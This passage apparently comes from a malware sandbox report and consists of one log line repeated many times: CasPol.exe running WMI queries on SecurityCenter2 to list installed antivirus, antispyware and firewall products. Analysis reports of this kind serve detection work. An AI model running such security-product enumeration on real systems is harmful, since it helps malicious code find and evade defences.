Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
